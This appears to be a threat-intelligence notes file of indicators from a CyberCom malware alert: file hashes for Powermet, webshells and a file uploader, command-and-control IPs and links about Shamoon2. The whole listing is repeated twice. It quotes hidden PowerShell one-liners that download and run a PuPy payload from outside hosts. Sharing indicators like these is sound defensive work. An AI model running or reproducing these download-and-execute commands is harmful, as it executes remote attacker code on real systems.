Blevene/QuickNotes

## QuickNotes
CyberCom

https://twitter.com/CNMF_VirusAlert/status/1146130046127681536

https://twitter.com/CNMF_VirusAlert/status/1146130046127681536


https://customermgmt.net/page/macrocosm - 37.220.6.115 (AS 20860 (Iomart Cloud Services Limited))

b09bce085a2bbc1c0498baf3f75b48f8c86db132ebfc64d72b300f47b7435e89 - Powermet ,	2017-01-14 03:35Z
> Source Doc: 528714aaaa4a083e72599c32c18aa146db503eee80da236b20aea11aa43bdf62
> Powershell: http://69.87.223.26:8080/eiloShaegae1
> 	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('http://69.87.223.26:8080/eiloShaegae1')"
>Payload: PUPY, 924b4615ba6e6ed87fad81ad4c2ae876d10a9b34fb347210a2ec7621b92005cb
> OSINT: https://www.netscout.com/blog/asert/additional-insights-shamoon2

f2bf20e7bb482d27da8f19aa0f8bd4927746a65300929b99166867074a38a4b4 - ASPX Webshell

28ebfe86217ed36ead5b429cadcd005338a0ae6207119729b53698b5e4a3ef3f - Powermet, 2017-01-06 16:50Z
> http://139.59.46.154:3485/eiloShaegae1
>	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('http://139.59.46.154:3485/eiloShaegae1')"
> Intermediate stage Downloader: http://139.49.46.154:3485/IMo8oosieVai
> Downloader for PuPy
> OSINT: https://securityintelligence.com/the-full-shamoon-how-the-devastating-malware-was-inserted-into-networks/

0515cd2ba84a5da10c63cadae06f04d778d66c054b9184edb57be6ea95a1095b - JSP Code Injector

dc546dc992b31b3927e63cefbfd2716ca016ca238f6142cf16e27b240b0d7bb9 - File Uploader
	CyberCom

	https://twitter.com/CNMF_VirusAlert/status/1146130046127681536

	https://twitter.com/CNMF_VirusAlert/status/1146130046127681536


	https://customermgmt.net/page/macrocosm - 37.220.6.115 (AS 20860 (Iomart Cloud Services Limited))

	b09bce085a2bbc1c0498baf3f75b48f8c86db132ebfc64d72b300f47b7435e89 - Powermet , 2017-01-14 03:35Z
	> Source Doc: 528714aaaa4a083e72599c32c18aa146db503eee80da236b20aea11aa43bdf62
	> Powershell: http://69.87.223.26:8080/eiloShaegae1
	> "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('http://69.87.223.26:8080/eiloShaegae1')"
	>Payload: PUPY, 924b4615ba6e6ed87fad81ad4c2ae876d10a9b34fb347210a2ec7621b92005cb
	> OSINT: https://www.netscout.com/blog/asert/additional-insights-shamoon2

	f2bf20e7bb482d27da8f19aa0f8bd4927746a65300929b99166867074a38a4b4 - ASPX Webshell

	28ebfe86217ed36ead5b429cadcd005338a0ae6207119729b53698b5e4a3ef3f - Powermet, 2017-01-06 16:50Z
	> http://139.59.46.154:3485/eiloShaegae1
	> "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('http://139.59.46.154:3485/eiloShaegae1')"
	> Intermediate stage Downloader: http://139.49.46.154:3485/IMo8oosieVai
	> Downloader for PuPy
	> OSINT: https://securityintelligence.com/the-full-shamoon-how-the-devastating-malware-was-inserted-into-networks/

	0515cd2ba84a5da10c63cadae06f04d778d66c054b9184edb57be6ea95a1095b - JSP Code Injector

	dc546dc992b31b3927e63cefbfd2716ca016ca238f6142cf16e27b240b0d7bb9 - File Uploader